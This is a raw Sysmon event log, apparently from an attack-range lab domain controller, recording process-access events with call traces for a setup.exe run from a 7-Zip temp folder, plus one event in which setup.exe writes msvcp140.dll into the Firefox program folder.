13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\msvcp140.dll2021-01-18 13:59:52.442 10341000x800000000000000015121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
